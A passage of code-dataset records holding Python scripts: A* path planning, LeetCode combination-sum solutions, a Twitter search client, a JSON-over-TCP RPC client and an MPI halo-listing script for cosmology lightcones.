children\n for child in children:\n for closed_child in closed_list: # for all nodes that have been checked\n if child == closed_child: # check if this node has been checked\n continue # if checked, don't process\n\n # total_cost, cost, and heuristic values\n child.cost = curr_node.cost + 1\n\n # child.heuristic = ((child.position[0] - end_node.position[0]) ** 2) + ((child.position[1] - 
end_node.position[1]) ** 2)\n child.heuristic = get_distance(child.position[0], child.position[1], end_node.position[0], end_node.position[1], \"diagonal\")\n \n # heuristic could either be chebychev or diagonal\n\n child.total_cost = child.cost + child.heuristic\n\n for open_node in open_list: # if child is in set of points pending opening\n child_is_open = child == open_node\n if child_is_open:\n if child.cost > open_node.cost:\n continue\n\n # Add the child to the open list\n expandedNodes = expandedNodes + 1\n open_list.append(child)","sub_path":"Machine Problems/MP1: Path Planning/astar.py","file_name":"astar.py","file_ext":"py","file_size_in_byte":4631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"46962665","text":"\"\"\"\n39. Combination Sum\n\nGiven an array of distinct integers candidates and a target integer target, return a list of all unique combinations of candidates where the chosen numbers sum to target. You may return the combinations in any order.\n\nThe same number may be chosen from candidates an unlimited number of times. Two combinations are unique if the frequency of at least one of the chosen numbers is different.\n\nIt is guaranteed that the number of unique combinations that sum up to target is less than 150 combinations for the given input.\n\n\n\nExample 1:\n\nInput: candidates = [2,3,6,7], target = 7\nOutput: [[2,2,3],[7]]\nExplanation:\n2 and 3 are candidates, and 2 + 2 + 3 = 7. Note that 2 can be used multiple times.\n7 is a candidate, and 7 = 7.\nThese are the only two combinations.\nExample 2:\n\nInput: candidates = [2,3,5], target = 8\nOutput: [[2,2,2,2],[2,3,3],[3,5]]\nExample 3:\n\nInput: candidates = [2], target = 1\nOutput: []\nExample 4:\n\nInput: candidates = [1], target = 1\nOutput: [[1]]\nExample 5:\n\nInput: candidates = [1], target = 2\nOutput: [[1,1]]\n\n\nConstraints:\n\n1 <= candidates.length <= 30\n1 <= candidates[i] <= 200\nAll elements of candidates are distinct.\n1 <= target <= 500\n\n\"\"\"\n\n\nclass CombinationSum:\n\n \"\"\"\n Approach 1: Backtracking\n Intuition\n\n As a reminder, backtracking is a general algorithm for finding all (or some) solutions to some computational problems. The idea is that it incrementally builds candidates to the solutions, and abandons a candidate (\"backtrack\") as soon as it determines that this candidate cannot lead to a final solution.\n\n Specifically, to our problem, we could incrementally build the combination, and once we find the current combination is not valid, we backtrack and try another option.\n\n Algorithm\n\n As one can see, the above backtracking algorithm is unfolded as a DFS (Depth-First Search) tree traversal, which is often implemented with recursion.\n\n Here we define a recursive function of backtrack(remain, comb, start) (in Python), which populates the combinations, starting from the current combination (comb), the remaining sum to fulfill (remain) and the current cursor (start) to the list of candidates. Note that, the signature of the recursive function is slightly different in Java. But the idea remains the same.\n\n For the first base case of the recursive function, if the remain==0, i.e. we fulfill the desired target sum, therefore we can add the current combination to the final list.\n\n As another base case, if remain < 0, i.e. we exceed the target value, we will cease the exploration here.\n\n Other than the above two base cases, we would then continue to explore the sublist of candidates as [start ... n]. 
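(Concretely, for candidates = [2,3,6,7] and target = 7: from start=0 we add 2 (remain 5), add 2 again (remain 3), and once the repeated-2 branch bottoms out, add 3 to reach remain == 0 and record [2,2,3].) 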
For each of the candidate, we invoke the recursive function itself with updated parameters.\n\n Specifically, we add the current candidate into the combination.\n\n With the added candidate, we now have less sum to fulfill, i.e. remain - candidate.\n\n For the next exploration, still we start from the current cursor start.\n\n At the end of each exploration, we backtrack by popping out the candidate out of the combination.\n\n \"\"\"\n def doit_backtracking(self, candidates: List[int], target: int) -> List[List[int]]:\n\n results = []\n\n def backtrack(remain, comb, start):\n if remain == 0:\n # make a deep copy of the current combination\n results.append(list(comb))\n return\n elif remain < 0:\n # exceed the scope, stop exploration.\n return\n\n for i in range(start, len(candidates)):\n # add the number into the combination\n comb.append(candidates[i])\n # give the current number another chance, rather than moving on\n backtrack(remain - candidates[i], comb, i)\n # backtrack, remove the number from the combination\n comb.pop()\n\n backtrack(target, [], 0)\n\n return results\n\n def doit(self, candidates, target):\n \"\"\"\n :type candidates: List[int]\n :type target: int\n :rtype: List[List[int]]\n \"\"\"\n def search(nums, i, target, cur):\n\n if target == 0:\n res.append(cur)\n return\n\n for j in range(i, len(nums)):\n if target - nums[j] >= 0:\n # next level starting from j, because we wanna same num nums[j]\n search(nums, j, target - nums[j], cur + [nums[j]])\n\n res = []\n search(candidates, 0, target, [])\n return res\n\n\n\"\"\"\n40. Combination Sum II\n\nGiven a collection of candidate numbers (candidates) and a target number (target), \nfind all unique combinations in candidates where the candidate numbers sum to target.\n\nEach number in candidates may only be used once in the combination.\n\nNote: The solution set must not contain duplicate combinations.\n\n \n\nExample 1:\n\nInput: candidates = [10,1,2,7,6,1,5], target = 8\nOutput: \n[\n[1,1,6],\n[1,2,5],\n[1,7],\n[2,6]\n]\nExample 2:\n\nInput: candidates = [2,5,2,1,2], target = 5\nOutput: \n[\n[1,2,2],\n[5]\n]\n \n\nConstraints:\n\n1 <= candidates.length <= 100\n1 <= candidates[i] <= 50\n1 <= target <= 30\n\"\"\"\n\n\nclass CombinationSumII(object):\n\n \"\"\"\n Approach 2: Backtracking with Index\n Intuition\n\n There is another way to adapt the solution of 39. Combination Sum.\n\n Rather than building a counter table to group the numbers together explicitly, we could sort the input, which could also group all the same numbers together.\n\n Similar to the solution of 39. Combination Sum, we iterate through the sorted input array, via backtracking to build the combinations.\n\n In addition, we need to do some tricks with the index of the iteration, in order to avoid generating duplicated combinations.\n\n We demonstrate the idea with the same example in the previous approach, i.e. input = [2, 5, 2, 2].\n\n index demo\n\n As we can see from the above graph, once we sort the input array, the occurrance of each unique number would be adjacent to each other.\n\n In the above graph, we show the moment we start to process the group of number 2, with the iteration index pointed to the beginning of the group.\n\n Next, we need to move the index forward, in order to choose the next number to be added to the combination. More importantly, we need to skip certain positions, in order to avoid the generation of duplicated combinations. We skip the position if the following two condtions are met:\n\n 1). 
next_curr > curr: we will pick the number at the current curr position into the combination, regardless of the other conditions. This is important, since the iteration should allow us to select multiple instances of a unique number into the combination.\n\n    2). candidates[next_curr] == candidates[next_curr-1]: we will skip the occurrences of all repetitive numbers in between, e.g. we skip the second and third occurrence of number 2 in this round of backtracking.\n\n    The combined effects of the above sorting and iterating operations are equivalent to the previous approach with the counter table.\n\n    Algorithm\n\n    It would be clearer to see how the above tricks with the index play out in the algorithm.\n\n    Similar to the previous approach, we implement the backtracking process with the function named backtrack(comb, remain, curr, results), but with fewer parameters compared to the previous approach.\n\n    The bulk of the function remains the same as the solution of 39. Combination Sum, except for the specific conditions on the index as we discussed before.\n\n    In addition, we optimize the backtracking a bit by adopting the measure of early stopping, i.e. once the sum of the current combination exceeds the target, we can stop the exploration for the rest of the numbers. Because all the numbers are positive, as specified in the problem, the sum of the combination will increase monotonically. It is needless to explore more combinations whose sum goes beyond the desired target.\n    O(2^N)\n    \"\"\"\n    def doit(self, candidates, target):\n        \"\"\"\n        :type candidates: List[int]\n        :type target: int\n        :rtype: List[List[int]]\n        \"\"\"\n        def dfs(start, target, item):\n            if target == 0:\n                result.append(item[:])\n                return\n\n            if target < 0:\n                return\n\n            for i in range(start, len(candidates)):\n                if candidates[i] > target:\n                    break\n                if i > start and candidates[i] == candidates[i - 1]:\n                    continue\n\n                item.append(candidates[i])\n                dfs(i + 1, target - candidates[i], item)\n                item.pop()\n\n        if candidates is None or len(candidates) == 0:\n            return [[]]\n\n        candidates.sort()\n        result = []\n        dfs(0, target, [])\n        return result","sub_path":"PythonLeetcode/leetcodeM/39_CombinationSum.py","file_name":"39_CombinationSum.py","file_ext":"py","file_size_in_byte":8977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"462192334","text":"# -*- coding:utf-8 -*-\r\nimport json, config\r\nfrom requests_oauthlib import OAuth1Session\r\n\r\n# API credentials\r\nCK = config.COUSUMER_KEY\r\nCS = config.COUSUMER_SECRET\r\nAT = config.ACCESS_TOKEN\r\nATS = config.ACCESS_TOKEN_SECRET\r\ntwitter = OAuth1Session(CK,CS,AT,ATS)\r\n\r\n# API endpoint\r\nurl = \"https://api.twitter.com/1.1/search/tweets.json\"\r\n\r\n# Prompt for the search keyword and the number of results\r\nprint(\"What do you want to search for?\")\r\nkeyword = input(\">> \")\r\nprint(\"How many results should be shown?\")\r\nnum = input()\r\nprint(\"---------------------------------------\")\r\n\r\n# Search keyword and result count\r\nparams = {'q' : keyword, 'count' : num}\r\n\r\nreq = twitter.get(url, params = params)\r\n\r\nif req.status_code == 200:\r\n    # Process the results if the request succeeded\r\n    search_timeline = json.loads(req.text)\r\n    for tweet in search_timeline['statuses']:\r\n        print(tweet['user']['name'] + '::' + tweet['text'])\r\n        print(tweet['created_at'])\r\n        print('------------------------------------')\r\nelse:\r\n    print(\"ERROR: %d\" % req.status_code) \r\n\r\n","sub_path":"test/searchtwieet.py","file_name":"searchtwieet.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
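# --- Added illustrative sketch (not one of the original dataset records) ---
# A minimal, hedged extension of the search script above: paginating the v1.1
# search endpoint with max_id. It reuses the `twitter` OAuth1Session and `url`
# defined in that script; the helper name and page count are assumptions.
def fetch_older_pages(keyword, pages=3):
    max_id = None
    for _ in range(pages):
        params = {'q': keyword, 'count': 100}
        if max_id is not None:
            params['max_id'] = max_id
        req = twitter.get(url, params=params)
        if req.status_code != 200:
            break
        statuses = req.json()['statuses']
        if not statuses:
            break
        for tweet in statuses:
            print(tweet['user']['name'] + '::' + tweet['text'])
        # ask only for tweets strictly older than the oldest one seen so far
        max_id = min(t['id'] for t in statuses) - 1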
+{"seq_id":"49419503","text":"#!/usr/bin/python3\nimport socket, argparse, json, struct, sys\n\nclass Client:\n\n\tdef __init__(self): \n\t\tself.start()\n\n\t# Purpose & Behavior: Uses argparse to process command line arguments into functions \n\t# and their respective inputs. \n\t# Input: Newly created object.\n\t# Output: namespace of command line arguments\n\tdef parse_cmd_arguments(self):\n\t\tparser = argparse.ArgumentParser()\n\t\tparser.add_argument('--server', default='localhost')\n\n\t\tsubparsers = parser.add_subparsers(dest='cmd')\n\n\t\tparser_set = subparsers.add_parser('set')\n\t\tparser_set.add_argument('key', type=str)\n\t\tparser_set.add_argument('val', type=str)\n\n\t\tparser_get = subparsers.add_parser('get')\n\t\tparser_get.add_argument('key', type=str)\n\n\t\tparser_print = subparsers.add_parser('print')\n\t\tparser_print.add_argument('text', nargs=\"*\")\n\n\t\tparser_query = subparsers.add_parser('query_all_keys')\n\n\t\targs = parser.parse_args()\n\t\treturn args\n\n\t# Purpose & Behavior: Starts TCP connection from this client to given server\n\t# Input: Newly created object, and command line argument namespace (args)\n\t# Output: Socket where TCP connection is created.\n\tdef start_connection(self, args):\n\t\t# if the optional argument \"--server\" is used, \n\t\t# then set localhost as this computer's IP. else, return error and exit.\n\t\tif (args.server is not None):\n\t\t\tif (args.cmd is None):\n\t\t\t\tprint (\"RPC command not provided.\")\n\t\t\t\tsys.exit()\n\t\t\t\n\t\tdest_host = str(args.server)\n\t\tdest_port = 38000 # destination port; where TCP connection with server is established\n\t\tsock = None\n\t\ttimeout = 5\n\n\t\t# tries to connect to dest_port; will continue until it either finds an open port or gives up\n\t\twhile (dest_port <= 38010):\n\t\t\tprint('Trying to connect to ' + dest_host + ':' + str(dest_port) + '...')\n\t\t\ttry:\n\t\t\t\tsock = socket.create_connection((dest_host, dest_port), timeout) # opens connection with server at dest_host:dest_port\n\t\t\t\tbreak\n\t\t\texcept: \n\t\t\t\tdest_port = dest_port + 1\n\t\t\t\tcontinue\n\t\tif sock is None:\n\t\t\tprint(\"Can’t establish a connection.\")\n\t\t\tsys.exit()\n\t\treturn sock\n\n\t# Purpose & Behavior: Creates a dictionary from the provided namespace; \n\t# deletes unnecessary entries and adds unique id entry to the dict.\n\t# Input: Newly created object, and command line argument namespace (args)\n\t# Output: Dictionary with relevant entries with keys (unique id, cmd, (key/text/val) depending on cmd)\n\tdef create_dict(self, args):\n\t\targs_dict = vars(args) # converts args namespace to a dict\n\t\tkeys_to_delete = []\n\n\t\t# removes \"server\" key from dict, \n\t\t# so we only send over the necessary arguments.\n\t\tfor key, value in args_dict.items():\n\t\t\tif (key == \"server\"):\n\t\t\t\tkeys_to_delete.append(key)\n\n\t\tfor key in keys_to_delete:\n\t\t\tdel args_dict[key]\n\n\t\trequest_id = 0 # creates a unique id for the RPC\n\t\targs_dict[\"id\"] = request_id # adds entry to args_dict with the \"id\" key\n\n\t\treturn args_dict\n\n\t# Purpose & Behavior: Encodes a message and then sends it to the defined server. 
\n\t# Input: Newly created object, and socket where TCP connection is created and the dictionary with relevant \n\t# entries with keys (unique id, cmd, (key/text/val) depending on cmd)\n\t# Output: None\n\tdef send_to_server(self, sock, args_dict):\n\t\t# serializing dict into a JSON formatted stream and then encoded \n\t\t# into a unicode string.\n\t\tsend_msg_encoded = json.dumps(args_dict).encode()\n\t\tsend_msg_length = len(send_msg_encoded) # send message size \n\t\tsend_msg_length_encoded = struct.pack(\"!i\", send_msg_length) # encodes an int as a 32-bit binary value; big-endian\n\n\t\ttry:\n\t\t\tsock.sendall(send_msg_length_encoded) # sends encoded \"message length\" to server\n\t\t\tsock.sendall(send_msg_encoded) # sends encoded message to server\n\t\texcept:\n\t\t\tprint (\"Failed send over whole message.\")\n\t\t\tif (sock is not None):\n\t \t\t\tsock.close()\n\t \t\t\tsys.exit()\n\n\t# Purpose & Behavior: Receives a message from the server and decodes it. \n\t# Input: Newly created object, and socket where TCP connection is created.\n\t# Output: None\n\tdef recv_from_server(self, sock):\n\t\t# Receive at most msg_length bytes\n\t\t# Returns value received\n\t\tlength_of_length = 4 # length of the (length of the received message)\n\t\ttry:\n\t\t\trecvd_msg_length_encoded = sock.recv(length_of_length, socket.MSG_WAITALL) # reads the message's (from client) length\n\t\t\trecvd_msg_length, = struct.unpack(\"!i\", recvd_msg_length_encoded) # decodes the 32-bit binary value as an int; big-endian\n\t\t\trecvd_msg = sock.recv(recvd_msg_length, socket.MSG_WAITALL)# reads the message from client\n\t\texcept ConnectionResetError:\n\t\t\tprint(\"Connection dropped.\")\n\t\t\tsys.exit()\n\n\t\tif (len(recvd_msg) == 0):\n\t\t\t# recv gives 0 result if the connection has been closed\n\t\t\tprint(\"Connection terminated.\") \n\t\t\tif (sock is not None):\n\t \t\t\tsock.close()\n\t \t\t\tsys.exit()\n\t\telif (len(recvd_msg) != recvd_msg_length):\n\t\t\tprint(\"Incomplete message.\") \n\t\t\tif (sock is not None):\n\t \t\t\tsock.close()\n\t \t\t\tsys.exit()\n\t\telse:\n\t\t\ttry:\n\t\t\t\trecvd_msg = recvd_msg.decode() # decodes the message from server\n\t\t\texcept:\n\t\t\t\tprint (\"Cannot decode message.\")\n\t\t\t\tif (sock is not None):\n\t \t\t\t\tsock.close()\n\t \t\t\t\tsys.exit()\n\t\t\tprint(recvd_msg) # prints out response from server; in the format of {'status': some_str, 'result': some_str, 'id': some_str} \n\n\tdef start(self):\n\t\targs = self.parse_cmd_arguments()\n\t\tsock = self.start_connection(args)\n\t\targs_dict = self.create_dict(args)\n\t\tself.send_to_server(sock, args_dict)\n\t\tself.recv_from_server(sock)\n\t\tsock.close() # closes connection with server\n\nif __name__ == '__main__':\n\tclient = Client()\n","sub_path":"Assignment#1/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"12245374","text":"# Joe Hollowed\n# CPAC 2018\n\nimport sys, os\n#sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'util'))\n\nimport pdb\nimport glob\nimport numpy as np\nfrom mpi4py import MPI\nimport genericio as gio\n#import lc_interpolation_validation as iv\n\ndef list_halos(lcDir, outDir, maxStep, minStep, rL, corrLength, phiMax, \n massDef = 'fof', minMass=1e14, maxMass=1e18, outFrac=0.01, numFiles=1):\n\n '''\n This function generates a list of halo tags, properties, and positions, in a text \n file, in the format expected by Use Case 2 of 
the lightcone cutout code\n at https://github.com/jhollowed/cosmo-cutout. That is, it reads the output of a\n halo lightcone run, finds all halos above some mass cut, and writes them to\n a text file with halos printed per-row, as such:\n \n output.txt:\n tag1 redshift1 mass1 radius1 conc1 conc_err1 x1 y1 z1\n tag2 redshift2 mass2 radius2 conc2 conc_err2 x2 y2 z2\n tag3 redshift3 mass3 radius3 conc3 conc_err3 x3 y3 z3\n .\n .\n .\n \n where the radius and conc columns will be omitted if the input arg massDef == \"fof\". \n The tags are written in the form {fof_halo_tag}_{lc_replication_identifier}\n\n This function is written with MPI support; if run with mpirun or mpiexec, then the \n lightcone shells found within the redshift range of interest will be distributed as \n evenly as possible across ranks.\n \n Params:\n :param lcDir: top-level directory of a halo lightcone, where the subdirectory \n structure is expected to match that described in section 4.5 (fig 7)\n of the Creating Lightcones in HACC document (step-wise subdirectories \n expected). It is expected that this lightcone was built using the\n interpolation lightcone driver, and thus the 'id' field is expected\n to contain merger tree fof tags (including fragment bits and sign). It is\n also assumed that this lightcone has been matched to either an fof or sod\n catalog.\n :para outDir: the output directory for the resultant text file\n :param maxStep: The largest (lowest redshift) lightcone shell to read in\n :param minStep: The smallest (highest redshift) lightcone shell to read in\n :param rL: The length of the simulation box underlying the input lightcone in Mpc/h\n :param corrLength: The length scale within which to consider the density field correlated \n with a halo, in Mpc/h-- halos within this length of a replicated box\n boundary will experience correlation breaks in the density field\n and will be rejected\n :param phiMax: the maximum angular scale that one may want to use on subsequent\n halo lightcone cutout runs given the halos output by this function, \n in arcseconds. Halos within that angular scale from the octant boundary\n will be rejected\n :param massDef: should either be \"fof\", \"sod\". In either case the lightcone pointed to by\n 'lcDir' is assumed to contain a mass column. If massDef='sod', then a radius,\n concentration, and concentration error is also assumed to be present in the\n lightcone\n :param minMass: The minimum halo mass to write out to the text files (defaults to 1e14)\n :param maxMass: The maximum halo mass to write out to the text files (defaults to 1e18, or \n no upper limit)\n :param outFrac: The fraction of the identified halos to actually output\n :param numFiles: How many text files to write. That is, if 30 halos are found in\n the lightcone at lcDir, between minStep and maxStep, and numFiles=3,\n then three text files will be written out, each containing 10 of the \n found halos. 
This option is intended to allow for separate cutout\n runs being submitted in parallel, each handling a subset of all the\n desired halos\n '''\n\n comm= MPI.COMM_WORLD\n rank = comm.Get_rank()\n numranks = comm.Get_size()\n if(rank==0):\n print('starting with {} MPI processes'.format(numranks))\n sys.stdout.flush()\n comm.Barrier()\n\n # get lightcone shells (step/snapshot numbers) matching those desired \n # by minStep and maxStep\n lcHaloSubdirs = glob.glob('{}/*'.format(lcDir))\n \n # step number is assumed to be the last three chars of the subirectory names\n steps = np.array(sorted([int(s[-3:]) for s in lcHaloSubdirs]))\n steps = steps[np.logical_and(steps >= minStep, steps <= maxStep)]\n \n # hand out different steps to different ranks. randomize them at rank 0 to \n # allow better load balancing\n np.random.seed(103)\n np.random.shuffle(steps)\n steps = np.array_split(steps, numranks)[rank]\n\n print(\"rank {} gets steps {}\".format(rank, steps))\n sys.stdout.flush()\n comm.Barrier()\n \n # arrays to hold halos in the lc found above the desired massCut (to be written out)\n write_ids = np.array([], dtype=np.int64)\n write_reps = np.array([], dtype=np.int32)\n write_x = np.array([], dtype=float)\n write_y = np.array([], dtype=float)\n write_z = np.array([], dtype=float)\n write_redshift = np.array([], dtype=float)\n write_shells = np.array([], dtype=np.int32)\n write_mass = np.array([], dtype=float)\n write_radius = np.array([], dtype=float)\n write_conc = np.array([], dtype=float)\n write_conc_err = np.array([], dtype=float)\n total=0\n\n # loop over lightcone shells\n for i in range(len(steps)):\n \n step = steps[i]\n if(step == 499): continue\n\n if(rank==0):\n print('\\n---------- working on step {} ----------'.format(step))\n sys.stdout.flush()\n \n if(rank==0):\n print('reading lightcone')\n sys.stdout.flush()\n \n # there should only be one unhashed gio file in this subdir\n lc_file = sorted(glob.glob('{1}/*{0}/*'.format(step, lcDir)))[0]\n \n # (the halo lightcone module outputs merger tree fof tags, including fragment bits)\n lc_tags = np.squeeze(gio.gio_read(lc_file, 'id'))\n lc_reps = np.squeeze(gio.gio_read(lc_file, 'replication')).astype(np.int32)\n lc_x = np.squeeze(gio.gio_read(lc_file, 'x'))\n lc_y = np.squeeze(gio.gio_read(lc_file, 'y'))\n lc_z = np.squeeze(gio.gio_read(lc_file, 'z'))\n lc_a = np.squeeze(gio.gio_read(lc_file, 'a'))\n lc_redshift = 1/lc_a - 1\n \n # get fof or sod properties from lightcone\n lc_mass = np.squeeze(gio.gio_read(lc_file, '{}_mass'.format(massDef)))\n if(massDef == 'sod'):\n lc_radius = np.squeeze(gio.gio_read(lc_file, 'sod_radius'))\n lc_conc = np.squeeze(gio.gio_read(lc_file, 'sod_cdelta'))\n lc_conc_err = np.squeeze(gio.gio_read(lc_file, 'sod_cdelta_error'))\n else:\n lc_radius = None \n lc_conc = None \n lc_conc_err = None \n\n if(rank == 0):\n print('read {} halos'.format(len(lc_mass)))\n \n # cut out id !!!!!!!!!!\n mass_mask = lc_tags == 485079778313\n \n # do mass cutting\n #mass_mask = np.logical_and(lc_mass >= minMass, lc_mass < maxMass)\n lc_tags = lc_tags[mass_mask]\n lc_reps = lc_reps[mass_mask]\n lc_redshift = lc_redshift[mass_mask]\n lc_mass = lc_mass[mass_mask]\n lc_radius = lc_radius[mass_mask]\n lc_conc = lc_conc[mass_mask]\n lc_conc_err = lc_conc_err[mass_mask]\n lc_x = lc_x[mass_mask]\n lc_y = lc_y[mass_mask]\n lc_z = lc_z[mass_mask]\n\n # add these halos to write-out arrays\n if(rank==0):\n print('Found {0} halos ({1:.5f}% of all) within mass range of {2:.2e}-{3:.2e}'\n .format(np.sum(mass_mask), 
(np.sum(mass_mask)/float(len(mass_mask)))*100, minMass, maxMass))\n sys.stdout.flush()\n if(rank==0):\n print('Appending halo data to write-out arrays')\n sys.stdout.flush()\n total += np.sum(mass_mask)\n if(rank==0):\n print('TOTAL: {}'.format(total))\n sys.stdout.flush()\n \n write_ids = np.hstack([write_ids, lc_tags])\n write_reps = np.hstack([write_reps, lc_reps])\n write_x = np.hstack([write_x, lc_x]) \n write_y = np.hstack([write_y, lc_y]) \n write_z = np.hstack([write_z, lc_z]) \n write_redshift = np.hstack([write_redshift, lc_redshift]) \n write_shells = np.hstack([write_shells, np.ones(np.sum(mass_mask))*step])\n write_mass = np.hstack([write_mass, lc_mass]) \n write_radius = np.hstack([write_radius, lc_radius])\n write_conc = np.hstack([write_conc, lc_conc])\n write_conc_err = np.hstack([write_conc_err, lc_conc_err])\n \n # Do downsampling according to outFrac arg\n if(len(write_ids)) > 0:\n if(outFrac != 1):\n if(rank==0):\n print('\\nDownsampling {0}% of {1} total halos'.format(outFrac*100, len(write_ids)))\n sys.stdout.flush()\n dsampling = np.random.choice(np.arange(len(write_ids)), int(len(write_ids)*outFrac), replace=False)\n write_ids = write_ids[dsampling]\n write_reps = write_reps[dsampling]\n write_x = write_x[dsampling]\n write_y = write_y[dsampling]\n write_z = write_z[dsampling]\n write_redshift = write_redshift[dsampling]\n write_shells = write_shells[dsampling]\n write_mass = write_mass[dsampling]\n write_radius = write_radius[dsampling]\n write_conc = write_conc[dsampling]\n write_conc_err = write_conc_err[dsampling]\n \n comm.Barrier()\n sys.stdout.flush()\n comm.Barrier()\n\n # send all data to rank 0 for writing\n counts = None\n tot = None\n dspls = None\n numhalos = np.ones(1, dtype='i')*len(write_ids)\n if(rank == 0): \n tot = np.zeros(1, dtype='i')\n counts = np.empty(numranks, dtype='i')\n comm.Reduce(numhalos, tot, op=MPI.SUM, root=0)\n comm.Gather(numhalos, counts, root=0)\n comm.Barrier()\n if(rank == 0):\n dspls = np.hstack([[0], np.cumsum(counts)[:-1]])\n print('{} total halos found across {} ranks'.format(tot, numranks))\n sys.stdout.flush()\n\n all_ids = None\n all_reps = None\n all_x = None\n all_y = None\n all_z = None\n all_redshift = None\n all_shell = None\n all_mass = None\n all_radius = None\n all_conc = None\n all_conc_err = None\n \n if(rank == 0):\n all_ids = np.empty(tot[0], dtype=np.int64)\n all_reps = np.empty(tot[0], dtype=np.int32)\n all_x = np.empty(tot[0], dtype=np.float64)\n all_y = np.empty(tot[0], dtype=np.float64)\n all_z = np.empty(tot[0], dtype=np.float64)\n all_redshift = np.empty(tot[0], dtype=np.float64)\n all_shell = np.empty(tot[0], dtype=np.int32)\n all_mass = np.empty(tot[0], dtype=np.float64)\n all_radius = np.empty(tot[0], dtype=np.float64)\n all_conc = np.empty(tot[0], dtype=np.float64)\n all_conc_err = np.empty(tot[0], dtype=np.float64)\n #print('Counts is {}, dspls is {}'.format(counts, dspls))\n print('Preparing to gather...')\n \n recv_ids = [all_ids, counts, dspls, MPI.LONG]\n recv_reps = [all_reps, counts, dspls, MPI.INT]\n recv_x = [all_x, counts, dspls, MPI.DOUBLE]\n recv_y = [all_y, counts, dspls, MPI.DOUBLE]\n recv_z = [all_z, counts, dspls, MPI.DOUBLE]\n recv_redshift = [all_redshift, counts, dspls, MPI.DOUBLE]\n recv_shells = [all_shell, counts, dspls, MPI.INT]\n recv_mass = [all_mass, counts, dspls, MPI.DOUBLE]\n recv_radius = [all_radius, counts, dspls, MPI.DOUBLE]\n recv_conc = [all_conc, counts, dspls, MPI.DOUBLE]\n recv_conc_err = [all_conc_err, counts, dspls, MPI.DOUBLE]\n\n comm.Gatherv([write_ids, 
numhalos], recv_ids, root=0)\n comm.Gatherv([write_reps, numhalos], recv_reps, root=0)\n comm.Gatherv([write_x, numhalos], recv_x, root=0)\n comm.Gatherv([write_y, numhalos], recv_y, root=0)\n comm.Gatherv([write_z, numhalos], recv_z, root=0)\n comm.Gatherv([write_redshift, numhalos], recv_redshift, root=0)\n comm.Gatherv([write_shells, numhalos], recv_shells, root=0)\n comm.Gatherv([write_mass, numhalos], recv_mass, root=0)\n comm.Gatherv([write_radius, numhalos], recv_radius, root=0)\n comm.Gatherv([write_conc, numhalos], recv_conc, root=0)\n comm.Gatherv([write_conc_err, numhalos], recv_conc_err, root=0)\n if(rank == 0):\n print('{} total halos gathered at rank 0'.format(len(all_ids)))\n sys.stdout.flush()\n \n # Now do writing to text file(s)\n if(rank==0):\n\n # remove duplicate halos\n print('Removing duplicate halos...')\n ask_unique = np.unique(all_ids, return_counts=True)\n unique_ids = ask_unique[0][ask_unique[1] == 1]\n id_mask = np.array([iid in unique_ids for iid in all_ids])\n\n # remove halos within correlation length of any replication boundary\n print('Removing halos with broken local correlations...')\n xm = np.abs((np.round(all_x/rL)*rL) - all_x) > corrLength\n ym = np.abs((np.round(all_y/rL)*rL) - all_y) > corrLength\n zm = np.abs((np.round(all_z/rL)*rL) - all_z) > corrLength\n pos_mask = np.logical_and(np.logical_and(xm, ym), zm)\n \n # and also any halos with a angular separation from the octant edge that \n # is less than the max cutout angular scale phiMax \n print('Removing halos within angular scale of octant boundary...')\n all_r = np.sqrt(all_x**2 + all_y**2 + all_z**2)\n phi = np.arctan(all_y/all_x)\n theta = np.arccos(all_z/all_r)\n phiMax = phiMax / 60 * np.pi/180.0\n thetaMax = phiMax\n ang_mask = np.logical_and(\n np.logical_and(theta > thetaMax/2, theta < ((np.pi/2-thetaMax/2))), \n np.logical_and(phi > phiMax/2, phi < ((np.pi/2-phiMax/2))))\n \n # combine id, spatial, and anuglar masks from above and cut\n mask = np.logical_and(np.logical_and(pos_mask, ang_mask), id_mask)\n all_ids = all_ids[mask]\n all_reps = all_reps[mask]\n all_x = all_x[mask]\n all_y = all_y[mask]\n all_z = all_z[mask]\n all_redshift = all_redshift[mask]\n all_shell = all_shell[mask]\n all_mass = all_mass[mask]\n all_radius = all_radius[mask]\n all_conc = all_conc[mask]\n all_conc_err = all_conc_err[mask]\n print('Removed {} total halos ({} spatial rejections and {} duplicates)'.format(np.sum(~mask), \n np.sum(np.logical_and(~pos_mask, ~ang_mask)), np.sum(~id_mask)))\n\n print('\\nDone, obtained {0} total halos to write across {1} text files'\n .format(len(all_ids), numFiles))\n sys.stdout.flush()\n \n # and combine tags and replication identifiers for unqiue ids\n combine_tags_reps = np.frompyfunc(\"{}_{}\".format, 2, 1)\n all_ids = combine_tags_reps(all_ids, all_reps)\n \n write_masks = np.array_split(np.arange(len(all_ids), dtype='i'), numFiles)\n for j in range(numFiles):\n wm = write_masks[j]\n next_file = open(\"{0}/lcHaloList_mass{1:.2e}-{2:.2e}_steps{3}-{4}_{5}.txt\"\n .format(outDir, minMass, maxMass, minStep, maxStep, j), 'w')\n print('writing {0} halos to file {1}'.format(len(wm), j+1))\n sys.stdout.flush()\n \n for n in range(len(wm)):\n if(massDef == 'sod'):\n next_file.write('{0} {1} {2} {3} {4} {5} {6} {7} {8} {9}\\n'.format(\n all_ids[wm][n], all_redshift[wm][n], \n all_shell[wm][n], all_mass[wm][n], all_radius[wm][n], \n all_conc[wm][n], all_conc_err[wm][n], \n all_x[wm][n], all_y[wm][n], all_z[wm][n]))\n elif(massDef == 'fof'):\n next_file.write('{0} {1} {2} {3} {4} 
